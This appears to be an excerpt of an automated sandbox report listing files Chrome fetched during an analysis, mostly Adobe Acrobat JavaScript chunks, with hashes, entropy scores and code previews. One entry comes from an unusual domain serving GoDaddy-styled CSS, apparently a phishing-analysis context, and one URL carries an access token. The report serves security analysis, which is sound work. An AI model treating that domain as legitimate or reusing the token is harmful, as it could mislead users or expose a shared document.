                  SHA-512:5A7B199B9FE8B5C898EBA12C27D78B8301AB2703339A7B545282ACB5F1AA1D6E169DAF37FD4E21CE6A778B1D866DF829F37A993C35BD81BFA686E232543DEAF0
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/libcld_we.d7f1adfa2ee11651dd6fea8deccb4ddf.wasm:2f8fd36ed3e862:1
                  Preview:K..2..&...;un......&|..}..?D}.-~.b...&..b.$.....)4<...}..Z..;.&L..-l|UAy..&....l.s*..-......84.>a... ...&..g.......}...{...-...)...}..k..fx...).J.)~..in..<...&.......<...+i..&....... ...w-6....ba.j...d3..+~..i..{...W....&...|J..}3....#@dj.@d..b~.~~..:..t....b..`e...`......}..uC..@k...}..>a........... ...}}..*......j.....r.....-...}..Vpb........}..X...'[....h..&...}...zW.Y....{......}....M......&....+..{...&...............|...&A.m~....4....#.&8.{.p.;...eb:..&...z.......i................j.]....|...?...........z-..3a..O.N........../......g!..C...!\.{..l..Rk/..<.@.....z...........z..J.z.{....?....4.>a...j....Q..........iT../u../..g...he.b.H...-..............Fmh.{....n......{....J..|N....`F....ip.6.7..-.yFmg$.i>.@k%.W}L..i5..*..Fm..b........J{...{.f.|...8.0...a......S.3..^...........{\MFm...}...c..@k...{n..c.......z...z...?......F...d...........Fm...{1(j...c...Y..c...i...-......:|..p..../...c..p....bp.....{?9!.bf.Rk..Cvl..c}.....~~y.b...c.[.bJ.>a......c...',..+....
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65378), with no line terminators
                  Category:downloaded
                  Size (bytes):125667
                  Entropy (8bit):5.443051361947289
                  Encrypted:false
                  SSDEEP:
                  MD5:A6F72F8B2E66FEF88E4DCDA1DEA131B2
                  SHA1:69913AA85AB5FAD620FAC2C3DA32CA6FE5963E2D
                  SHA-256:400CC44044D45845B7FD90A9BB7B6096864849E432B0767788EAA821868A0E12
                  SHA-512:7409864CF79B003149492A89E882C90862BD996701B4C2D6304C716C8B0509B638ED59028D03064A42B64000258A27ADFC1F064EF811F54846BEF2EE77EB32C9
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/306.js
                  Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[306],{"8KsQ":(e,r,t)=>{"use strict";r.U=CrossLarge;var a=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(t("YWiy"));function _extends(){return _extends=Object.assign||function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var a in t)Object.prototype.hasOwnProperty.call(t,a)&&(e[a]=t[a])}return e},_extends.apply(this,arguments)}function _objectWithoutProperties(e,r){if(null==e)return{};var t,a,o=function _objectWithoutPropertiesLoose(e,r){if(null==e)return{};var t,a,o={},i=Object.keys(e);for(a=0;a<i.length;a++)t=i[a],r.indexOf(t)>=0||(o[t]=e[t]);return o}(e,r);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);for(a=0;a<i.length;a++)t=i[a],r.indexOf(t)>=0||Object.prototype.propertyIsEnumerable.call(e,t)&&(o[t]=e[t])}return o}function CrossLarge(e){var r=e.scale,t=void 0===r?"M":r,o=_objectWithoutProperties(e,["scale"]);return a.default.createElement("svg",_
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):274981
                  Entropy (8bit):5.640703844986755
                  Encrypted:false
                  SSDEEP:
                  MD5:99F7C40AEE4C1C11E3057A575394BF99
                  SHA1:078613A5FC29F906F49CD6B9A76FB024269EB823
                  SHA-256:4F3E36FCDC535A62410349E79E170C2B7ED4638F80C9AC91C36C6AAC7998B95C
                  SHA-512:E5AEC4FB1743D4C56AB8E7DBBA0345E4FCBE90C60E9A7EAE7C987CE071F21F18BAAE0C0ED02F2B37D5DD1DFEAEF909C66F70F054FA475A313CB548EBA9D05BDD
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/AIAContainer-chunk-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[1347],{E82R:(e,t,n)=>{e.exports=n("aEmt")},aEmt:(e,t,n)=>{"use strict";var r=n("AAps");t.default=void 0;var o,i,s,a=r(n("QNma")),l=r(n("vPca")),c=r(n("khqL")),d=r(n("qavZ")),u=r(n("qJYQ")),p=r(n("i44B")),m=r(n("AAps")),g=r(n("YE4w")),f=n("yyL8"),A=n("f6H/"),h=r(n("/hLX")),b=r(n("YWiy")),v={"cs-CZ":(0,m.default)(n("wUE9")).default,"da-DK":(0,m.default)(n("GX9A")).default,"de-DE":(0,m.default)(n("wD2g")).default,"en-US":(0,m.default)(n("GslP")).default,"es-ES":(0,m.default)(n("CsJx")).default,"fi-FI":(0,m.default)(n("wfS/")).default,"fr-FR":(0,m.default)(n("sy+0")).default,"hu-HU":(0,m.default)(n("Tv1g")).default,"it-IT":(0,m.default)(n("UVHr")).default,"ja-JP":(0,m.default)(n("81HM")).default,"ko-KR":(0,m.default)(n("FCB+")).default,"nb-NO":(0,m.default)(n("65Eq")).default,"nl-NL":(0,m.default)(n("65MW")).default,"pl-PL":(0,m.default)(n("cnGp")).default,"pt-BR":(0,m.default)(n("qNYs")).default,"ru-RU":(0,m.default)(n("TM
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (9649)
                  Category:downloaded
                  Size (bytes):9709
                  Entropy (8bit):5.455759981709321
                  Encrypted:false
                  SSDEEP:
                  MD5:8D6A47CAD099CAB62CF3619121608AE5
                  SHA1:5F39F4AC42AE4D2F3B3441B0CB83F22CEB46D8CE
                  SHA-256:2C241B4146A9291A0622035BEA4BB21AFBE9C81D3DECA250B7258A4148DB3156
                  SHA-512:0CCFA73437AAE2798F226207C49A12C6EB9A7B4453D232CF0DEAEFECD44E893335F6DBCCE0758C140C529602542F6740C863962FEE6F6492A4D545192FF82C0C
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-edit-dropin/3.17.0_3.90.0/partialEditDropin-chunk.js
                  Preview:(self["webpackJsonp-edit"]=self["webpackJsonp-edit"]||[]).push([[1627],{Kn3m:(e,r,t)=>{"use strict";t.r(r),t.d(r,{default:()=>A});var i=t("YWiy"),n=t("plsW"),s=t("+Q9V"),a=t("efTs"),o=t("3DPS"),d=t("1ADn"),p=t("Lcoi"),l=t("dzAV"),_=t("Zn9I"),g=t("/gWV"),P=t("98vq"),c=t("/hLX"),u=t.n(c),E=t("Zx/b"),w=t("C3yi"),m=t("/y6s"),f=t("u7Uj"),b=t("6GqG"),T=t("/xFG"),x=t("9dbF");class EditManager extends i.Component{constructor(e){super(),(0,_.J)(),this.apis=e.apis,this._testApiHandlerPromise=null,p.appStore.setIntl(e.intl),s.default.addPreviewApisAndConfig(this.apis,e.config);const r=e.config.shouldPreloadEditModule;"true"===(0,a.DY)(window.location.href,"exposeEditTestApis")&&(this._testApiHandlerPromise=Promise.all([t.e(4216),t.e(1607),t.e(3941)]).then(t.bind(t,"zzhh")).then((e=>{const r=e.default;return window.handleEditTestApis=r,r})));const i=s.default.previewConfig&&s.default.previewConfig.disableEditFeatures&&s.default.previewConfig.disableEditFeatures.disableFormatText;p.persistentStore.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:downloaded
                  Size (bytes):64
                  Entropy (8bit):4.4921329146247215
                  Encrypted:false
                  SSDEEP:
                  MD5:4850DEB19886EF66A2491A71369DCB0C
                  SHA1:241C2903C8A0FBB1ADA19183C473BAD7B3224473
                  SHA-256:50F2F7B6CC1456491C18D87B2F6B91B30E131E6F4C5BB9788A76A35C94C59CAD
                  SHA-512:8CBBAC7CD756D5D944846DEFF477A391E7502170D7DDC80CD158DEF2332D490DDFAE22640DF8212B6FD61A84ECAD05F6889D850FA6BFA024477EDDFC2E252647
                  Malicious:false
                  Reputation:unknown
                  URL:https://cdn-sharing.adobecc.com/rendition/id/urn:aaid:sc:EU:ed356bc9-bf5a-442b-8177-cf362f34cfc8;page=1;size=1200;type=image%2Fjpeg?access_token=1742997079_urn%3Aaaid%3Asc%3AEU%3Aed356bc9-bf5a-442b-8177-cf362f34cfc8%3Bpublic_34c9674a33f31a1472ffd85d52f528e1219cf563&api_key=dc_sendtrack
                  Preview:{"status":404,"type":"NOT_FOUND","detail":"Rendition not found"}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PDF document, version 1.7, 1 pages
                  Category:dropped
                  Size (bytes):152353
                  Entropy (8bit):7.956960879526208
                  Encrypted:false
                  SSDEEP:
                  MD5:25110AA4DAB31E2845145500E05B889D
                  SHA1:8159FA2511B3DD93CD533025DA41ED6BB2F3B3EE
                  SHA-256:7A8C8212FB8AB4C54C633B4595FF80500C9E46052188BE8BB4D5605737DCDED6
                  SHA-512:D9E28229FCEE94466C4CDE152925E203F84D3EF46DCFFA66931FB4F157B2F44E6E225B6D2DDF025F5D71BA633BE0795C7C74ACA053F61EEEE3E1EE50E96C43BD
                  Malicious:false
                  Reputation:unknown
                  Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 20 0 R/MarkInfo<</Marked true>>/Metadata 55 0 R/ViewerPreferences 56 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 1/Kids[ 3 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 14 0 R/F5 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 13 0 R] /MediaBox[ 0 0 595.5 842] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2030>>..stream..x..[Yo.F.~....}.H#...."...M..k.........H.....wfxI"i+....&.K~.........y7..7...'G...8....G..K..[vpt...v\...A.+.2.jG.@...../{,.v.......q..'...a..L..H.|.;.`...z...=<.M.,...w;.X........1<..ng7lo.. s.U v|z..6x[..#.b$.b$..t...t...J%.0..X.b......^X..(...G......]..Z.J.^`E.t.}e.Tv..Zn.@+.[[ZC.'..?.=.C>.i....xN....m......:a.\..[.o.x.b.\...y.w..M..z.S..d[.U.....l.f..o..z.6c]..
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:downloaded
                  Size (bytes):35786
                  Entropy (8bit):5.058073854893359
                  Encrypted:false
                  SSDEEP:
                  MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                  SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                  SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                  SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/abNpD22RWbd7Wprs4eQef30
                  Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65471)
                  Category:downloaded
                  Size (bytes):95176
                  Entropy (8bit):5.208849037179669
                  Encrypted:false
                  SSDEEP:
                  MD5:A779FE24792BA607572C7E8A0757B46B
                  SHA1:48BB522274F89E1B4C58FEC9CFB91A726A17B284
                  SHA-256:73AD85D7C7C2F31169826DCD257C4AB299AD85894F54D3499313692985EDD12C
                  SHA-512:A02583F3E210333473A48852B55160F1E10EE944F4C96EE174DB97A2E52416E1BC421DF348795FEABE74C413C9ADABB6941E085AAA5CC089AF877A688A7F0475
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-core/3.71.0/dc-mobx.js
                  Preview:/*! For license information please see dc-mobx.js.LICENSE.txt */.(()=>{var e={SDwO:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"auth",{enumerable:!0,get:function(){return i.auth}}),Object.defineProperty(t,"locale",{enumerable:!0,get:function(){return a.locale}});var r,o=n("y986"),i=n("ewvR"),a=n("Ydhh"),s=(r=n("Z2FK"))&&r.__esModule?r:{default:r};(0,o.useStrict)(!0),window.adobe_dc_sdk.appLauncher.coreFunction().addProvider("asset",s.default.getInstance)},Z2FK:(e,t,n)=>{"use strict";function r(e){return r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}function o(e,t){for(var n=0;n<t.length;n++){var o=t[n];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(e,(void 0,i=function(e,t){if("object"!==r(e)||null===e)return e;var n=e[Symb
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (584)
                  Category:downloaded
                  Size (bytes):676
                  Entropy (8bit):5.207701869945217
                  Encrypted:false
                  SSDEEP:
                  MD5:104776B141F05020BF6E49D89A02185A
                  SHA1:916E7BD1D76E4F889BD421CE58CE43D4C208D536
                  SHA-256:EECF5729B204931BF10558726EA97E68772E9392457675D241DB09571D1AB830
                  SHA-512:33B998648E224DE3C61C198A461FA1B428EE9C58E7FB9EC2376272B3739E2D7B89740A6DF3B480BAB067A41D89A6E9628BA2BD7457FB8546A3EF462E90D74941
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/PopoverLayout.7f85596a572361b58e55.bundle.js
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["PopoverLayout"],{515:(n,e,t)=>{t.r(e),t.d(e,{default:()=>r});var o=t(918),a=t(625);function r(n){return{layout:"popover",universalNavComponentFragment:(0,a.k)("<div class='unav-comp-".concat(n,"-popover' data-test-id='unav-").concat(n,"--popover'>\n </div>")),collapseLayoutClickHandler:function(n){return window.removeEventListener("resize",(function(){return(0,o.C)(n)}))},layoutClickAction:function(n){(0,o.C)(n),window.addEventListener("resize",(function(){return(0,o.C)(n)}))}}}}}]);
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):184633
                  Entropy (8bit):5.6797275363591915
                  Encrypted:false
                  SSDEEP:
                  MD5:1EB8A4E0BBD7112DF8BB747107C11788
                  SHA1:012E6EBD8BE7A7AF44B5CF9AD7E555CF79E4726C
                  SHA-256:220CDBB39698C76F9EEECA30B01F22CAC1F77CD07A232805138B3C6E132ED9D2
                  SHA-512:1817690CACFFAE4B622A18623DD8308EED293F8D6C7ECCE5532CB95EEABB8F9B6CC16FCDE723CCD6219654FD6B09BC129B2C9BB0FAFE7E0094E7A523BB957996
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-conversions2-dropin/3.17.1_2.146.0/bootstrap.js
                  Preview:(()=>{var e,t,o,r,i={Xoby:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default={workflows:{acrobat:"acrobat"},subcategories:{express:"express",scToAcp:"sc-to-acp",transformPdf:"transform-pdf"},types:{agreementDraft:"agreement-draft",agreementDraftIncluded:"agreement-draft-included",cancelDialog:"cancel-dialog",ccxJob:"ccx-job",complete:"complete",compressRetry:"compress-retry",confirmSave:"confirm-save",continueDialog:"continue-dialog",discover:"discover",documentOrganizer:"document-organizer",documentRendition:"document-rendition",downloadAsset:"download-asset",dropzone:"dropzone",entry:"entry",error:"error",express:"express",fileNotSupported:"file-not-supported",filepicker:"filepicker",filesDropped:"files-dropped",filesProcessed:"files-processed",filesSelected:"files-selected",gotoApp:"goto-app",importSelection:"import-selection",importToAcp:"import-to-acp",importViewer:"import-viewer",job:"job",landing:"landing",navAway:"nav-away-dialog",navBar:"nav-bar",n
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):89843
                  Entropy (8bit):5.558637800098364
                  Encrypted:false
                  SSDEEP:
                  MD5:E3221B966372D0376E9447B2D12B553B
                  SHA1:E2032FF49AD5A2A651AF2B92DE6B5B493490B3F9
                  SHA-256:65CD01BF5AB982DE51E461B192E977F95D0FFD3DD382E243743BC942E96644F5
                  SHA-512:F682209C603EB222F6B82F6DFB36D7B83423399B9540B7577507D8146DA5988ED3F58090462C48F61AB066451BF61EE46F99EC3DA66E288A8130DD332EA2C256
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/tools-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="e3705ed5-0772-418d-9b41-20cec4245c33",e._sentryDebugIdIdentifier="sentry-dbid-e3705ed5-0772-418d-9b41-20cec4245c33")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[5895],{H8In:e=>{"use strict";var t,i="object"==typeof Reflect?Reflect:null,s=i&&"function"==typeof i.apply?i.apply:function ReflectApply(e,t,i){return Function.prototype.apply.call(e,t,i)};t=i&&"function"==typeof i.ownKeys?i.ownKeys:Object.getOwnPropertySymbols?function ReflectOwnKeys(e){return Object.getOwnPropertyNames(e).concat(Object.getOwnPropertySymbols(e))}:function ReflectOwnKeys(e){return Object
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (23640)
                  Category:downloaded
                  Size (bytes):23686
                  Entropy (8bit):5.542023996653367
                  Encrypted:false
                  SSDEEP:
                  MD5:CCF6F9A64F395D5D795789F539BA57A7
                  SHA1:03F6BEB74158B5B18A8B709403D88806E265E18B
                  SHA-256:0DE266765AF597CEC1B8E3A8255FA2016DEE6AD5A543CCC130C438086CFA5554
                  SHA-512:9E043BF9D21D4AE520EDC5C5F9866233E01F4FCF167546C02ABCA1D748E0DEB7317796540ADD094A82DE2A7492212A07B646F53E44892E1B47FC65FA8040ABA0
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/172-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="4b5dcfd3-c3a8-4dfc-900f-8b8c5ae9b8b6",e._sentryDebugIdIdentifier="sentry-dbid-4b5dcfd3-c3a8-4dfc-900f-8b8c5ae9b8b6")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[172,3805],{AXyZ:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function toString(){return this.map((function(t){var r=function cssWithMappingToString(e,t){var r=e[1]||"",n=e[3];if(!n)return r;if(t&&"function"==typeof btoa){var a=function toComment(e){var t=btoa(unescape(encodeURIComponent(JSON.stringify(e)))),r="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(t);re
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (20739), with no line terminators
                  Category:downloaded
                  Size (bytes):20742
                  Entropy (8bit):4.9130970653848305
                  Encrypted:false
                  SSDEEP:
                  MD5:02200E202DDE15D4F9A97DBBAD328507
                  SHA1:0C6C52F71E2FC243A76391B458073FAF58CB24D6
                  SHA-256:3906B16B1D613AEE79688B3F24DAEF301D5E6971EC328311C2B2157A44B682AA
                  SHA-512:55A084A6E9D0E5D36F01F60843C2DEA939FD1CEE286752F6B08179DC12BE9F0FA15257437B6935F7D65BC185F5BDCF914E3097E843BC73A2E4221110091FB43F
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-review-dropin/3.21.0_2.326.0/translations-chunk.js
                  Preview:"use strict";(self["webpackJsonp-review"]=self["webpackJsonp-review"]||[]).push([[1543],{t39f:e=>{e.exports=JSON.parse('{"startReview":"Start reviewing","sendSharedDocument":"{ other } shared this link","entryDialogTitle":"{ other } has shared a document with you","receiveUpdate":"Continue to add your own, or reply to other people\'s comments. Others will see your profile name and photo.","onSendContinueClick":"Do you want to add this link to your Recent Files list and share your profile name and photo with the sender?","sendNotifyAndViewProfilePermission":" { other } will be notified that you have viewed the document and will be able to see your profile.","signInDifferent":"Sign in as different user","skip":"Skip","signInAdobe":"Sign In with Adobe ID","initiator":"INITIATOR","opened":"opened","finished":"Finished","not_opened":"Not opened","okay":"Ok","openInAcrobatDesktop":"Open In desktop app","lastCommented":"Last accessed, ","maxReviewerCountText":"The maximum number of people hav
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (16642)
                  Category:downloaded
                  Size (bytes):16695
                  Entropy (8bit):5.218559964487747
                  Encrypted:false
                  SSDEEP:
                  MD5:0D16AAA1029C3C8F6211F1AA761AFEE0
                  SHA1:26127D6F2649AAB3E3F16A5B50D683768EA54247
                  SHA-256:590BAF2FDF3A6757CCB0C6E3F3F61EEF9B3B54B559B2116D1BBF293E9D83CCF5
                  SHA-512:0A2FC38403B9D74E57CCFC64B0CF8AF282928B181CE83E60B4AF20C1E39187B52FEF9E14DC53FD568AEAE6529715350E34C0FD7D661E0983963706C8B59F4E41
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home3-dropin/3.58.0_1.572.0/onboarding-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="9df7dea0-3d93-449e-80ae-675f632d3662",e._sentryDebugIdIdentifier="sentry-dbid-9df7dea0-3d93-449e-80ae-675f632d3662")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"263853adbe3f8c6ef3e7fe097b0d550acf2a7b0f"},(self["webpackJsonp-home3"]=self["webpackJsonp-home3"]||[]).push([[1352],{"+I19":(e,t,n)=>{"use strict";n.d(t,{A:()=>appConfig_parser});const o=function findObject(e,t){for(const n of Object.keys(e))if(e[n]){if(!t[n])return!1;if("object"==typeof e[n]&&"object"==typeof t[n]){if(!findObject(t[n],e[n]))return!1}else if(t[n]!==e[n])return!1}return!0};function ownKeys(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.fil
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):296352
                  Entropy (8bit):5.1513466750955645
                  Encrypted:false
                  SSDEEP:
                  MD5:303F686BAAF9077BE12D8E1C56795D4A
                  SHA1:4A75B1356BE19EA9F795D602D46D8FC45348AF0D
                  SHA-256:F4C8482EDC5E664C7AD4486981F5A18BE727A47AF7F83499DD3FED3F34EA2058
                  SHA-512:1760392B3C3D4E4A392050EE8897827D5481B65ED0C30949B968AA30A5DC12FAC4B08A56C824A532A2D55C72085D02B53074608DC36CE5EA61042C152B364FE9
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/241-0358528fa9e8e7bfe112.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[241],{33278:function(e,o,a){a.d(o,{N:function(){return t}});var t={data:{commitmentVariantsOffers:{__typename:"CommitmentVariantsOffersResult",result:[{__typename:"CommitmentVariantsOffers",sourceOfferId:"83A816A865AAD4CEB5CCFA3917CD3070",sourceOffer:{__typename:"Offer",id:"83A816A865AAD4CEB5CCFA3917CD3070",commitment:"YEAR",currency:{__typename:"Currency",code:"USD",delimiterValue:".",formatString:"'US$'#,##0.00",precision:!0,symbol:"US $"},customerSegment:"INDIVIDUAL",marketSegments:["COM"],maxOrderingQuantity:1,offerType:"BASE",pricePoint:"REGULAR",productArrangementCode:"S-PA-103",term:"MONTHLY"},offers:[{__typename:"PersonalizedOffer",offer:{__typename:"Offer",analytics:{__typename:"PersonalizedOfferAnalytics",actionBlockId:"64658_339958ActionBlock_0",campaignId:"64658",containerId:"11",controlGroupId:"",treatmentId:"3b36c177-0abf-4ed9-8f6d-04b7fe8677aa",variationId:"339958"},appliedPromotions:[{__typename:"Appl
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (4393), with no line terminators
                  Category:downloaded
                  Size (bytes):4393
                  Entropy (8bit):5.014632059504129
                  Encrypted:false
                  SSDEEP:
                  MD5:E6CF4C4E8F16249F80E5A7DF3A1C01D1
                  SHA1:A9B571F3BF5F0CB980D8718BAB56667DFDE2153D
                  SHA-256:108DE41E1E13A34109AB03AB9D060A53B9EB6E711CBE4545F3AF774C17425A4C
                  SHA-512:7FACB4586A3ED55A746EA711FDA74E0765711C4397956A62B686D23C3593F0F4F945DE64146C608512A3461047CF1F5863460C9A860F8E0512A9A190444CC215
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/kygWDW_WlBN6S-uFI_zl3/_buildManifest.js
                  Preview:self.__BUILD_MANIFEST=function(a,s){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/_error":["static/chunks/pages/_error-24ec6a09f6ca2112.js"],"/academic":[a,s,"static/chunks/pages/academic.4a1ac6e0.css","static/chunks/pages/academic-28d6a052195085b1.js"],"/account-error":["static/chunks/pages/account-error-05771acf2a4677d6.js"],"/bundle":[a,s,"static/chunks/pages/bundle.b6261fe3.css","static/chunks/pages/bundle-47cf8b4e061b3f41.js"],"/change-plan/team-upgrade/addon":[a,s,"static/chunks/pages/change-plan/team-upgrade/addon.dc075bf5.css","static/chunks/pages/change-plan/team-upgrade/addon-b4758c6e0b3daf00.js"],"/change-plan/team-upgrade/confirmation":[a,s,"static/chunks/pages/change-plan/team-upgrade/confirmation-5e21afd96e80321b.js"],"/change-plan/team-upgrade/payment":[a,s,"static/chunks/pages/change-plan/team-upgrade/payment-db096a5c4eb3fba7.js"],"/change-plan/team-upgrade/plans":[a,s,"static/chunks/pages/change-plan/team-upgrade/plans.9a57a580.css","static/chunks/page
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (60830)
                  Category:downloaded
                  Size (bytes):140952
                  Entropy (8bit):5.809669933155172
                  Encrypted:false
                  SSDEEP:
                  MD5:7DCF46A7D2DED8B290FC01617EC9BC9B
                  SHA1:A42AE5990EED70C3CEF0F039D17D739E167E34AD
                  SHA-256:FCB2EBF39EF758579EB9EE5F85D7CF41317BA82F711EE0347FD1C943DE7CE961
                  SHA-512:3C8E8C91CF92D1AACBFBABB438341140E761207CEB744EB0F6C6458C07C03DB5D9DD0744A3B557115D7782E0FD0D6465A1F6213C04126875EBDD080D0FCC8251
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/momentJS-chunk.js
